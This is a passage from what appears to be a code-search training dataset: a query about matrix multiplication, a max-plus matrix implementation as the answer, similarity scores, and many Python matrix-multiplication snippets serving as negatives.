self.expr_list: return self.expr_list[key]\n else:\n if key < 0: key += len(self)\n if self.expr_tensor:\n return dy.pick(self.expr_tensor, key, dim=len(self.expr_tensor.dim()[0])-1)\n else:\n return dy.pick(self.expr_transposed_tensor, key, dim=0)", "def get_tile(self, point):\n print \"Getting tile for %s\" % repr(point)\n return self.matrix[point.y][point.x]", "def get_map_item(self, idx, col=0, absolute=False):\n\n return self.itemDataMap[self.itemIndexMap[idx] if not absolute else idx][self.get_real_col(col)]", "def __getitem__(self, i):\n return self.data[i]", "def __getitem__(self, x):\n return self.query(x)", "def get_tile(self, row, col):\r\n # replace with your code\r\n return self._cells[row][col]", "def get_item(self):\n raise NotImplementedError", "def __getitem__(self, keep):\n return self.get([self], keep)[0]", "def __getitem__(self, rq):\n return self._data[rq]", "def __getitem__(self, *args):\n return _osgAnimation.vectorMatrixKeyframe___getitem__(self, *args)" ]
[ "0.75138944", "0.7311626", "0.7112711", "0.7027379", "0.69761306", "0.68627983", "0.6828977", "0.6801616", "0.67811024", "0.6719613", "0.6719613", "0.6719613", "0.6648522", "0.6594458", "0.6576159", "0.65010285", "0.64954424", "0.6479522", "0.6468668", "0.6449649", "0.6440751", "0.6394753", "0.6376016", "0.63435096", "0.6336273", "0.63342947", "0.63190305", "0.62635773", "0.62488973", "0.62280035", "0.6220941", "0.62119496", "0.62093467", "0.6203135", "0.6181611", "0.61763054", "0.61631024", "0.61514103", "0.61514103", "0.61514103", "0.61499727", "0.6145736", "0.61297566", "0.61295646", "0.61290073", "0.6124381", "0.610882", "0.60986596", "0.6083407", "0.608233", "0.60788774", "0.6075778", "0.60738254", "0.60738254", "0.6070422", "0.60656", "0.6065153", "0.60554224", "0.6051583", "0.6036876", "0.6028241", "0.60198665", "0.6015904", "0.60121596", "0.6010473", "0.60100436", "0.6008482", "0.60056436", "0.59932125", "0.59928143", "0.59928143", "0.59911394", "0.5987451", "0.59829736", "0.59809536", "0.59658206", "0.59635574", "0.5947133", "0.5937196", "0.5934427", "0.59309196", "0.5925652", "0.59209585", "0.59205997", "0.5916795", "0.5916795", "0.59142846", "0.5911844", "0.59108776", "0.5906915", "0.5897352", "0.58968437", "0.58915883", "0.5891361", "0.5889527", "0.58849245", "0.5879714", "0.5876176", "0.58736414", "0.5869378" ]
0.61327946
42
r""" Multiplication of matrices
def __mul__(self, other):
    if type(self) != type(other) and \
            not isinstance(self, SymbolicMaxPlusMatrix) and \
            not isinstance(other, SymbolicMaxPlusMatrix):
        raise TypeError("can not multiply {} with {}".format(type(self), type(other)))
    if self._d != other._d:
        raise TypeError("dimension or number of variable mismatch")
    d = self._d
    new_data = [[None]*d for _ in range(d)]
    for i in range(d):
        for j in range(d):
            vertices = set()
            for k in range(d):
                l = [x+y for x in self[i,k] for y in other[k,j]]
                for v in l:
                    v.set_immutable()
                vertices.update(l)
            new_data[i][j] = self.convex_hull(vertices)
    return SymbolicMaxPlusMatrix(d, self._nvars, tuple(new_data), self.convex_hull)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def matrix_mult(m1, m2):\n pass", "def Multiply(M1,M2):\r\n M3=[]\r\n w=0\r\n while w<len(M2[0]):\r\n tap=[]\r\n t=0\r\n while t<len(M2):\r\n tap.append(M2[t][w])\r\n t=t+1\r\n M3.append(tap)\r\n w=w+1\r\n M=[]\r\n # Multiplying matrices\r\n k=0\r\n sums=0\r\n while k<len(M1):\r\n j=0\r\n mpy=[]\r\n while j<len(M3):\r\n p=0\r\n sums=0\r\n while p<len(M3[j]):\r\n temp = (M1[k][p])*(M3[j][p])\r\n sums=sums+temp\r\n p=p+1\r\n mpy.append(sums)\r\n j=j+1\r\n M.append(mpy)\r\n k=k+1\r\n return M", "def multiply_matrices(a, b):\n try:\n x = len(b[0])\n except:\n b = make_2D(b)\n try:\n x = len(a[0])\n except:\n a = make_2D(a)\n if len(a[0]) != len(b):\n print 'error: matrices cannot be multiplied'\n return\n out = np.zeros((len(a), len(b[0])))\n for i in range(len(out)):\n for j in range(len(out[0])):\n sum = 0\n for k in range(len(a[i])):\n sum += a[i][k] * b[k][j]\n out[i][j] = sum\n return out", "def mul(self,mat1,mat2):\n if(isinstance(mat2,int)==True):\n result = [[mat1[i][j] * mat2 for j in range(len(mat1[0]))] for i in range(len(mat1))]\n self.out = result\n return self.out\n elif(len(mat1[0])==len(mat2)):\n result = [[sum(a*b for a,b in zip(i,j)) for j in zip(*mat2)] for i in mat1]\n self.out = result\n return self.out", "def mat_mul(mat1, mat2):\n\n if len(mat1[0]) == len(mat2):\n\n mat2 = matrix_transpose(mat2)\n response = []\n\n for row in range(len(mat1)):\n response.append(\n [\n sum(dot_product(mat1[row], mat2[column]))\n for column in range(len(mat2))\n ]\n )\n\n return response\n\n else:\n return None", "def matMul(a, b):\n sa=matShape(a)\n sb=matShape(b)\n if sa[1]!=sb[0]: raise ValueError\n ret=matZeros((sa[0],sb[1]))\n for i in range(sa[0]):\n for j in range(sb[1]):\n val=0.0\n for k in range(sa[1]):\n val+=matGet(a,i,k)*matGet(b,k,j)\n matSet(ret,i,j,val)\n return ret", "def __mul__(self,m):\n if type(m) != Matrix:\n raise TypeError('The second argument is not a matrix lol')\n if self.ncols != m.nrows:\n raise ValueError('matrix dot argument has incorrect number of rows')\n new = Matrix(self.nrows,m.ncols)\n columns = m.getCols()\n rowindex = 0\n colindex = 0 \n for row in self.matrix:\n colindex = 0 \n for col in columns:\n summ = 0\n for i,j in zip(row,col):\n summ+= i*j \n new.matrix[rowindex][colindex] = summ\n print new.matrix\n colindex += 1 \n rowindex+=1\n return new", "def matrix_mult_matrix(matrix_a, matrix_b):\n m = len(matrix_a)\n n = len(matrix_b)\n result = []\n matrix_b_t = transpose_matrix(matrix_b)\n for i in xrange(m):\n row = []\n\tfor j in xrange(m):\n row.append(dot_product(matrix_a[i], matrix_b_t[j]))\n\tresult.append(row)\n return result", "def matmul(a, b):\n raise NotImplementedError", "def lazy_matrix_mul(m_a, m_b):\n return np.dot(m_a, m_b)", "def multiply_matrices(list):\n # Section 1: Start matrix product using 1st matrix in list\n matrix_product = list[0]\n\n # Section 2: Loop thru list to create product\n for matrix in list[1:]:\n matrix_product = matrix_multiply(matrix_product, matrix)\n\n return matrix_product", "def __matmul__(self, q: np.ndarray) -> np.ndarray:\n return self.product(q)", "def lazy_matrix_mul(m_a, m_b):\n m_a = np.array(m_a)\n m_b = np.array(m_b)\n\n return m_a.dot(m_b)", "def mat_mul(mat1, mat2):\n\n rows1 = len(mat1)\n cols1 = len(mat1[0])\n rows2 = len(mat2)\n cols2 = len(mat2[0])\n\n if cols1 != rows2:\n return None\n else:\n new_matrix = []\n for x in range(rows1):\n aux_row = []\n for y in range(cols2):\n aux_sum = []\n for z in range(cols1):\n aux_sum.append(mat1[x][z] * mat2[z][y])\n aux_row.append(sum(aux_sum))\n 
new_matrix.append(aux_row)\n\n return new_matrix", "def __mul__(self, other):\n # \n # TODO - your code here\n #\n \n result = [];\n row_result = [];\n product = 0;\n \n if(self.w != other.h):\n raise(ValueError, \"Matrices can not multiply for their dimesion doesn't match\"); \n \n for row in self.g:\n row_result = [];\n for j in range(other.w):\n product = dot_product(row,other.get_column(j));\n row_result.append(product);\n result.append(row_result);\n \n return Matrix(result);", "def matrix_mult(m1, m2):\n output = []\n for rowIndex, row in enumerate(m1): #go through rows in m1\n new_row = []\n for columnIndex in range(len(m2[0])): #go through indices for each column of m2\n sum = 0\n for index3 in range(len(row)):\n product = m1[rowIndex][index3] * m2[index3][columnIndex]\n sum += product\n new_row.append(sum)\n output.append(new_row)\n return output\n \n \n #output = []\n #first for loop corresponds to the rows of my output matrix and loops through the rows of m1 (enumerate)\n #create an empty new row\n # second for loop, loops through columns of m2\n # create sum variable, initialize it with zero\n # third for loop, multiplies the index of the row in m1 times the index of the column in m2\n # add sum to product and assign this to the sum variable\n # append sum to new row\n # append new row to output\n # return output", "def __mul__(self, other):\n if self.n != other.m:\n raise TypeError(\"Illegal dimensions for mul operator\")\n tmp = [[0 for _ in xrange(self.n)] for _ in xrange(other.m)]\n for i in xrange(self.n):\n for j in xrange(other.m):\n for k in xrange(other.n):\n tmp[i][j] += self.values[i][k] * other.values[k][j]\n res = []\n for i in tmp:\n res += i\n return simplematrix(self.n, other.m, res)", "def matrix_mult(m1, m2):\n\ttemp = []\n\tfor i in range(len(m1)):\n\t\te = []\n\t\tfor j in range(len(m2[0])):\n\t\t\te.append(row_times_column(m1,i,m2,j))\n\t\ttemp.append(e)\n\treturn temp", "def matrixMul(self, matrix, matrix2):\n matrix0 = matrix[:]\n matrix[0] = matrix0[0] * matrix2[0] + matrix0[2]*matrix2[1] # + matrix0[4]*0\n matrix[1] = matrix0[1] * matrix2[0] + matrix0[3]*matrix2[1] # + matrix0[5]*0\n matrix[2] = matrix0[0] * matrix2[2] + matrix0[2]*matrix2[3] # + matrix0[4]*0\n matrix[3] = matrix0[1] * matrix2[2] + matrix0[3]*matrix2[3] # + matrix0[5]*0\n matrix[4] = matrix0[0] * matrix2[4] + matrix0[2]*matrix2[5] + matrix0[4]\n matrix[5] = matrix0[1] * matrix2[4] + matrix0[3]*matrix2[5] + matrix0[5]", "def lazy_matrix_mul(m_a, m_b):\n return np.matmul(np.array(m_a), np.array(m_b))", "def multiM(*args):\r\n filas_1,filas_2 = len(args[0]),len(args[1])\r\n columnas_1,columnas_2 = len(args[0][0]),len(args[1][0])\r\n matriz_r = []\r\n for k in range(filas_1):\r\n matriz_r.append([0]*columnas_2)\r\n for i in range(columnas_2):\r\n matriz_r[k][i] = 0\r\n for i in range(filas_1):\r\n for j in range(columnas_1):\r\n for k in range(columnas_2):\r\n matriz_r[i][k] = matriz_r[i][k] + args[0][i][j] * args[1][j][k]\r\n return matriz_r", "def matrixMultiply(a, colsA, b, colsB):\r\n\trowsA = len(a)\r\n\trowsB = len(b)\r\n\r\n\t# rowsA x colsA ... 
rowsB x colsB \r\n\tassert rowsA == colsB, \"matrix dimensions not fit for multiplication\"\r\n\r\n\t# result size: rowsA x colsB\r\n\tr = rowsA * [None]\r\n\tfor i in range(rowsA):\r\n\t\tr[i] = colsB * [None]\r\n\t\tfor j in range(colsB):\r\n\t\t\t\tr[i][j] = sum( a[i][k]* b[k][j] for k in range(colsA))\r\n\treturn r", "def __mul__(self, other):\n #\n # TODO - your code here\n #\n final_matrix = []\n for i in range(self.h):\n temp_row = []\n for j in range(other.w):\n # take dot-product of row of\n # matrix in 1st arg with col of\n # matrix in 2nd arg\n temp_row.append(dot_product(get_row(self.g, i), get_col(other.g, j)))\n final_matrix.append(temp_row)\n return Matrix(final_matrix)\n # TODO - your code here", "def matrix_mul(m_a, m_b):\n rows_a = 0\n cols_a = 0\n rows_b = 0\n cols_b = 0\n if type(m_a) is not list:\n raise TypeError(\"m_a must be a list\")\n if type(m_b) is not list:\n raise TypeError(\"m_b must be a list\")\n length = []\n for row in m_a:\n if type(row) is not list:\n raise TypeError(\"m_a must be a list of lists\")\n for row in m_b:\n if type(row) is not list:\n raise TypeError(\"m_b must be a list of lists\")\n if m_a == [] or m_a == [[]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b == [] or m_b == [[]]:\n raise ValueError(\"m_b can't be empty\")\n for row in m_a:\n cols_a = 0\n for elem in row:\n if type(elem) is not int and type(elem) is not float:\n raise TypeError(\"m_a should contain only integers or floats\")\n cols_a += 1\n for row in m_b:\n cols_b = 0\n for elem in row:\n if type(elem) is not int and type(elem) is not float:\n raise TypeError(\"m_b should contain only integers or floats\")\n cols_b += 1\n for row in m_a:\n length.append(len(row))\n rows_a += 1\n if not len(set(length)) <= 1:\n raise TypeError(\"each row of m_a must be of the same size\")\n length.clear()\n for row in m_b:\n length.append(len(row))\n rows_b += 1\n if not len(set(length)) <= 1:\n raise TypeError(\"each row of m_b must be of the same size\")\n if cols_a != rows_b:\n raise ValueError(\"m_a and m_b can't be multiplied\")\n new = [[0 for i in range(cols_b)] for j in range(rows_a)]\n for new_rows in range(rows_a):\n for new_cols in range(cols_b):\n for i in range(cols_a):\n new[new_rows][new_cols] += m_a[new_rows][i] * m_b[i][new_cols]\n return new", "def mmultiply(self, matrix):\n try:\n result_matrix = [[0 for row in range(len(self.matrix))] for col in range(len(matrix[0]))]\n for i in range(len(self.matrix)):\n for j in range(len(matrix[0])):\n for k in range(len(matrix)):\n result_matrix[i][j] += self.matrix[i][k] * matrix[k][j]\n self.matrix = result_matrix\n except IndexError:\n pass\n pass", "def np_matmul(mat1, mat2):\n return np.matmul(mat1, mat2)", "def matrix_multiply(m1, m2):\n\n\tproduct = numpy.matmul(m1, m2)\n\tif type(product) == numpy.int64:\n\t\treturn float(product)\n\telse:\n\t\tresult = list(product)\n\t\treturn result", "def matrix_mult(A,B):\n\n m = len(A)\n p = len(B)\n n = len(B[0])\n AB = []\n for i in range(m):\n AB.append([])\n for j in range(n):\n total = 0\n for k in range(p):\n total += A[i][k] * B[k][j]\n AB[i].append(total)\n return AB", "def __matmul__(self, B):\n m, n = self.shape\n n_, r = B.shape\n assert n == n_, (\"Cannot multiply shapes \"\n \"({}, {}) and ({}, {})\".format(m, n, n_, r))\n mul_ = dict()\n # compute A_ik = sum_j A_ij*B_jk\n for i in range(m):\n for k in range(r):\n prod = mpfr(0)\n for j in range(n):\n prod += self[i, j] * B[j, k]\n mul_[i, k] = prod\n return MPMatrix((m, r), mul_)", "def 
matrixMultiplication(firstMatrix, secondMatrix):\n if len(firstMatrix[0]) == len(secondMatrix): # Checks whether the matrices can be multiplied or not or not\n finalMatrix = []\n for y in range(len(firstMatrix)): # 2\n currentMatrix = []\n for i in range(len(secondMatrix[0])):\n currentSum = 0\n for j in range(len(secondMatrix)):\n currentSum += secondMatrix[j][i] * firstMatrix[y][j]\n currentMatrix.append(currentSum)\n print(\"This is my current matrix: \" + str(currentMatrix))\n finalMatrix.append(currentMatrix)\n print(\"This product of the two matrices is :) \" + str(finalMatrix))\n else:\n print(\"This operation cannot be done, make sure the rows of the first matrix is the same as the number of columns in the second matrix\")", "def matrix_multiply(self, Am, Bm):\r\n # Section 1: Ensure A & B dimensions are correct for multiplication\r\n rowsA = len(Am)\r\n colsA = len(Am[0])\r\n rowsB = len(Bm)\r\n colsB = len(Bm[0])\r\n if colsA != rowsB:\r\n raise ArithmeticError(\r\n 'Number of A columns must equal number of B rows.')\r\n \r\n # Section 2: Store matrix multiplication in a new matrix\r\n C = self.zeros_matrix(rowsA, colsB)\r\n for i in range(rowsA):\r\n for j in range(colsB):\r\n total = 0\r\n for ii in range(colsA):\r\n total += Am[i][ii] * Bm[ii][j]\r\n C[i][j] = total\r\n \r\n return C", "def matmul():\n\n if RESULT_IN_NVRAM:\n matrix_c = ResultMatrixInDaos()\n else:\n matrix_c = ResultMatrixInMemory()\n\n # This could be trivially optimized by reordering indexes\n # and caching either a_block or b_block (assuming C in-memory).\n # *However* it would result in unfair comparisons with the \n # previous implementation used elsewhere.\n # Using the naive algorithm makes sense for a raw comparison.\n for i in range(MATRIXSIZE):\n for j in range(MATRIXSIZE):\n partial_result_block = np.zeros((BLOCKSIZE, BLOCKSIZE))\n\n for k in range(MATRIXSIZE):\n a_block = np.fromstring(\n DAOS_KV[\"A%02d%02d\" % (i, k)],\n dtype=NP_FROMSTRING_DTYPE\n ).reshape((BLOCKSIZE, BLOCKSIZE))\n\n b_block = np.fromstring(\n DAOS_KV[\"B%02d%02d\" % (k, j)],\n dtype=NP_FROMSTRING_DTYPE\n ).reshape((BLOCKSIZE, BLOCKSIZE))\n\n partial_result_block += a_block @ b_block\n \n matrix_c[i,j] = partial_result_block\n\n return matrix_c", "def matrix_multiply(A,B):\n rowsA = len(A)\n colsA = len(A[0])\n\n rowsB = len(B)\n colsB = len(B[0])\n\n if colsA != rowsB:\n raise ArithmeticError('Number of A columns must equal number of B rows.')\n\n C = zeros_matrix(rowsA, colsB)\n\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C", "def _mul(*args):\n\treturn functools.reduce(numpy.dot, args)", "def matrixMultiplication(self, n, id, context):\n\n print(\"id: {}\".format(id))\n # Create one matrix\n f = 1\n m1 = []\n for x in range(n):\n row = []\n for y in range(n):\n row.append(f)\n f = f + 1\n m1.append(row)\n # The second matrix is equal to the first matrix\n m2 = m1\n print(\"m2: {}\".format(m2))\n\n # Multiply matrices\n m3 = []\n for i in range(n):\n row = []\n for j in range(n):\n sum = 0\n for k in range(n):\n sum = sum + m1[i][k] * m2[k][j]\n row.append(sum)\n m3.append(row)\n\n sum = 0\n # add the entries\n for i in range(n):\n for j in range(n):\n sum = sum + m3[i][j]\n\n print(\"Result of multiplication is {}\".format(sum))\n return sum", "def matrix_mul(m_a, m_b):\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if 
len(list(filter(lambda i: not isinstance(i, list), m_a))) > 0:\n raise TypeError(\"m_a must be a list of lists\")\n if len(list(filter(lambda i: not isinstance(i, list), m_b))) > 0:\n raise TypeError(\"m_b must be a list of lists\")\n if m_a is None or m_a == [] or m_a == [[]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b is None or m_b == [] or m_b == [[]]:\n raise ValueError(\"m_b can't be empty\")\n for r in m_a:\n for v in r:\n if not isinstance(v, (int, float)):\n raise ValueError(\"m_a should contain only integers or floats\")\n for r in m_b:\n for v in r:\n if not isinstance(v, (int, float)):\n raise ValueError(\"m_b should contain only integers or floats\")\n if max(map(lambda i: len(i), m_a)) != min(map(lambda i: len(i), m_a)):\n raise TypeError(\"each row of m_a must be of the same size\")\n if max(map(lambda i: len(i), m_b)) != min(map(lambda i: len(i), m_b)):\n raise TypeError(\"each row of m_b must be of the same size\")\n try:\n w = (len(m_a) + (0, 1)[len(m_a) == 1])\n m_c = [(['x'] * w) for b in range(len(m_b[0]))]\n for i in range(len(m_a)):\n for j in range(len(m_b[0])):\n s = 0\n for k in range(len(m_a[0])):\n s += (m_a[i][k] * m_b[k][j])\n m_c[i][j] = s\n return list(filter(lambda r: r != (['x'] * w), m_c))\n except:\n raise ValueError(\"m_a and m_b can't be multiplied\")", "def lazy_matrix_mul(m_a, m_b):\n return (np.matmul(m_a, m_b))", "def matrixMult( self, matrix0, matrix1 ):\r\n result = {}\r\n keys = sorted( set( matrix0.keys() ) )\r\n count = range( len( matrix0.keys() ) )\r\n \r\n for key in keys:\r\n result[ key ] = []\r\n for i in count:\r\n sum = 0\r\n for j in count:\r\n sum += matrix0[ key ][j] * matrix1[ keys[j] ][i]\r\n result[ key ].insert( i, sum )\r\n \r\n return result", "def multiply(a, b):\n columns_of_a = len(a[0])\n lines_of_b = len(b)\n if columns_of_a != lines_of_b:\n # Check matrix dimensions\n print \"Incompatible sizes!\"\n else:\n lines_of_a = len(a)\n columns_of_b = len(b[0])\n #C = []\n #for i in range (lines_of_a):\n # C.append(columns_of_b * [0])\n c = [columns_of_b * [0] for i in range(lines_of_a)]\n for i in range(lines_of_a):\n for j in range(columns_of_b):\n for k in range(lines_of_b):\n c[i][j] += a[i][k] * b[k][j]\n return c", "def matmul(xs: List[List[float]],\n ys: List[List[float]]) -> List[List[float]]:\n product = []\n for x_row in range(len(xs)):\n row = []\n for y_col in range(len(ys[0])):\n col = [ys[y_row][y_col] for y_row in range(len(ys))]\n row.append(Math.dot(xs[x_row], col))\n product.append(row)\n return product", "def multiply_matrices(A, B):\n # Section 1: Ensure A & B dimensions are correct for multiplication\n rowsA = len(A)\n colsA = len(A[0])\n rowsB = len(B)\n colsB = len(B[0])\n if colsA != rowsB:\n raise ArithmeticError(\n 'Number of A columns must equal number of B rows.')\n\n # Section 2: Store matrix multiplication in a new matrix\n C = zeros_matrix(rowsA, colsB)\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C", "def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out", "def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out", "def matrix_mul(m_a, m_b):\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if not all(isinstance(lst, list) for lst in m_a):\n raise TypeError(\"m_a must be a 
list of lists\")\n if not all(isinstance(lst, list) for lst in m_b):\n raise TypeError(\"m_b must be a list of lists\")\n if m_a in [[], [[]]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b in [[], [[]]]:\n raise ValueError(\"m_b can't be empty\")\n if not all(all(isinstance(i, (int, float)) for i in lst) for lst in m_a):\n raise TypeError(\"m_a should contain only integers or floats\")\n if not all(all(isinstance(i, (int, float)) for i in lst) for lst in m_b):\n raise TypeError(\"m_b should contain only integers or floats\")\n if not all(len(i) == len(m_a[0]) for i in m_a):\n raise TypeError(\"each row of m_a must be of the same size\")\n if not all(len(i) == len(m_b[0]) for i in m_b):\n raise TypeError(\"each row of m_b must be of the same size\")\n if not len(m_a[0]) == len(m_b):\n raise ValueError(\"m_a and m_b can't be multiplied\")\n new_matrix = [[0 for i in m_b[0]] for j in m_a]\n for i in range(len(m_a)):\n for j in range(len(m_b[0])):\n for k in range(len(m_b)):\n new_matrix[i][j] += m_a[i][k] * m_b[k][j]\n return new_matrix", "def np_matmul(mat1, mat2):\n return mat1.dot(mat2)", "def matmul(x, y):\n return np.matmul(x, y)", "def MultiplyMatrix(matrixA, matrixB):\r\n # result matrix initialized as singularity matrix\r\n result = [[0 for y in range(len(matrixB[0]))] for x in range(len(matrixA))]\r\n for i in range(len(matrixA)):\r\n # iterate through columns of Y\r\n for j in range(len(matrixB[0])):\r\n # iterate through rows of Y\r\n for k in range(len(matrixB)):\r\n result[i][j] += matrixA[i][k] * matrixB[k][j]\r\n return result", "def _multi_matmul(arrays, order, i, j, constant=False) -> Tensor:\n if i == j:\n return arrays[i]\n else:\n return matmul(\n _multi_matmul(arrays, order, i, order[i, j], constant),\n _multi_matmul(arrays, order, order[i, j] + 1, j, constant),\n constant,\n )", "def __mul__(self, other):\r\n T = type(other)\r\n # mat4*scalar\r\n if T==types.FloatType or T==types.IntType or T==types.LongType:\r\n return mat4(map(lambda x,other=other: x*other, self.mlist))\r\n # mat4*vec3\r\n if isinstance(other, _vec3):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n w = float(m41*other.x + m42*other.y + m43*other.z + m44)\r\n return _vec3(m11*other.x + m12*other.y + m13*other.z + m14, \r\n m21*other.x + m22*other.y + m23*other.z + m24, \r\n m31*other.x + m32*other.y + m33*other.z + m34)/w\r\n # mat4*vec4\r\n if isinstance(other, _vec4):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n return _vec4(m11*other.x + m12*other.y + m13*other.z + m14*other.w, \r\n m21*other.x + m22*other.y + m23*other.z + m24*other.w, \r\n m31*other.x + m32*other.y + m33*other.z + m34*other.w,\r\n m41*other.x + m42*other.y + m43*other.z + m44*other.w)\r\n # mat4*mat4\r\n if isinstance(other, mat4):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n n11,n12,n13,n14,n21,n22,n23,n24,n31,n32,n33,n34,n41,n42,n43,n44 = other.mlist\r\n return mat4( m11*n11+m12*n21+m13*n31+m14*n41,\r\n m11*n12+m12*n22+m13*n32+m14*n42,\r\n m11*n13+m12*n23+m13*n33+m14*n43,\r\n m11*n14+m12*n24+m13*n34+m14*n44,\r\n\r\n m21*n11+m22*n21+m23*n31+m24*n41,\r\n m21*n12+m22*n22+m23*n32+m24*n42,\r\n m21*n13+m22*n23+m23*n33+m24*n43,\r\n m21*n14+m22*n24+m23*n34+m24*n44,\r\n\r\n m31*n11+m32*n21+m33*n31+m34*n41,\r\n m31*n12+m32*n22+m33*n32+m34*n42,\r\n m31*n13+m32*n23+m33*n33+m34*n43,\r\n m31*n14+m32*n24+m33*n34+m34*n44,\r\n\r\n m41*n11+m42*n21+m43*n31+m44*n41,\r\n m41*n12+m42*n22+m43*n32+m44*n42,\r\n 
m41*n13+m42*n23+m43*n33+m44*n43,\r\n m41*n14+m42*n24+m43*n34+m44*n44)\r\n # unsupported\r\n else:\r\n raise TypeError, \"unsupported operand type for *\"", "def Mult(A, B, C_, IM, M):\n for i in range(M):\n for j in range(M):\n for k in range(M):\n C_[i, j] = A[i, j] * B[i, j]", "def matmul(A, B):\n\n A._check('*', B, A.shape[1], B.shape[0])\n return A.from_rep(A.rep.matmul(B.rep))", "def matrixMul(a, b):\n # Initializing Empty Matrix\n c = [[0, 0], [0, 0]]\n # 2x2 matrix multiplication. Essentially O(1)\n for i in range(2):\n for j in range(2):\n for k in range(2):\n c[i][j] = (c[i][j] + (a[i][k] * b[k][j]))\n\n # Returning the products\n return c", "def mult(m1, m2):\n assert np.shape(m1) == (2, 3)\n assert np.shape(m2) == (2, 3)\n\n m1_temp = np.vstack((m1, [0, 0, 1]))\n m2_temp = np.vstack((m2, [0, 0, 1]))\n result = m1_temp * m2_temp\n\n return result[:2, :]", "def recursive_multiply(a, b):\n if len(a) == 2:\n return naive_multiply(a, b)\n\n a11 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a11):\n a11[index] = row[0:int(len(row) / 2)]\n\n a12 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a12):\n a12[index] = row[int(len(a) / 2):len(a)]\n\n a21 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a21):\n a21[index] = row[0:int(len(row) / 2)]\n\n a22 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a22):\n a22[index] = row[int(len(a) / 2):len(a)]\n\n b11 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b11):\n b11[index] = row[0:int(len(row) / 2)]\n\n b12 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b12):\n b12[index] = row[int(len(b) / 2):len(b)]\n\n b21 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b21):\n b21[index] = row[0:int(len(row) / 2)]\n\n b22 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b22):\n b22[index] = row[int(len(b) / 2):len(b)]\n\n c11 = matrix_add(recursive_multiply(a11, b11), recursive_multiply(a12, b21)) # C11 = A11*B11 + A12*B21\n c12 = matrix_add(recursive_multiply(a11, b12), recursive_multiply(a12, b22)) # C12 = A11*B12 + A12*B22\n c21 = matrix_add(recursive_multiply(a21, b11), recursive_multiply(a22, b21)) # C21 = A21*B11 + A22*B21\n c22 = matrix_add(recursive_multiply(a21, b12), recursive_multiply(a22, b22)) # C22 = A21*B12 + A22*B22\n\n # Append c12 to c11\n for row_index, row in enumerate(c11):\n for col_index, col in enumerate(c12):\n row.append(c12[row_index][col_index])\n\n # Append c22 to c21\n for row_index, row in enumerate(c21):\n for col_index, col in enumerate(c12):\n row.append(c22[row_index][col_index])\n\n # Append c21 to c11\n for i in c21:\n c11.append(i)\n\n return c11", "def matrix_multiply(A, B):\n # Section 1: Ensure A & B dimensions are correct for multiplication\n rowsA = len(A); colsA = len(A[0])\n rowsB = len(B); colsB = len(B[0])\n if colsA != rowsB:\n raise ArithmeticError(\n 'Number of A columns must equal number of B rows.')\n\n # Section 2: Store matrix multiplication in a new matrix\n C = zeros_matrix(rowsA, colsB)\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C", "def square_matrix_multiply(a, b):\n n = len(a)\n c = [[0]*n for _ in range(n)]\n for i in range(n):\n for j in range(n):\n sm = 0\n for k in range(n):\n sm += (a[i][k] * b[k][j])\n c[i][j] = sm\n\n return c", "def multiply(A, B):\n\n if len(A[0]) != len(B):\n raise Exception(\"Matrix dimensions do not match for matrix multiplication: %d x %d and %d x %d\" % (len(A), len(A[0]), len(B), len(B[0])))\n\n 
result = [[0] * len(B[0]) for i in range(len(A))]\n\n for i in range(len(A)):\n for j in range(len(B[0])):\n\n result[i][j] = LinAl.dot(A[i], LinAl.transpose(B)[j])\n\n return result", "def matrix_product(mat1: List[List[int]], mat2: List[List[int]]):\n if len(mat1) == 0 or len(mat2) == 0:\n raise ValueError(\"One of matrix is empty\")\n n, k1 = len(mat1), len(mat1[0])\n k2, m = len(mat2), len(mat2[0])\n if k1 != k2:\n raise ValueError(\n f\"Can't multiply two matrices with shapes {n}x{k1} and {k2}x{m}\"\n )\n mat2_t = matrix_transpose(mat2)\n return [[vec_product(vec1, vec2) for vec2 in mat2_t] for vec1 in mat1]", "def __mul__(self, other):\n\n # Scalar multiplication\n if isinstance(other, (int, long, float, complex)):\n return Matrix(self.rows, self.columns, [other * x for x in self.data])\n\n if not issubclass(type(other), Matrix):\n raise TypeError(type(other))\n\n if self.columns != other.rows:\n raise ValueError(\"Undefined multiplication for these matrices\")\n\n result = []\n for i in range(1, self.rows + 1):\n row = self.row(i)\n result.extend([dot_product(row, other.column(j)) for j in range(1, other.columns + 1)])\n\n return Matrix(self.rows, other.columns, data = result)", "def __matmul__(self, other):\n return F.MatMul.apply(self, other)", "def __mul__(self, other):\n if isinstance(other, Vector):\n # Matrix vector product\n v = Vector(list())\n for n in range(len(other.vectors)):\n v += scale(other.vectors[n][n], self.vectors[n])\n return v\n elif isinstance(other, Matrix):\n # Matrix matrix product\n if self.n != other.m:\n raise ValueError(\"Wrong fucking sizes, nøøb\")\n\n selfVectors = self.vectors\n 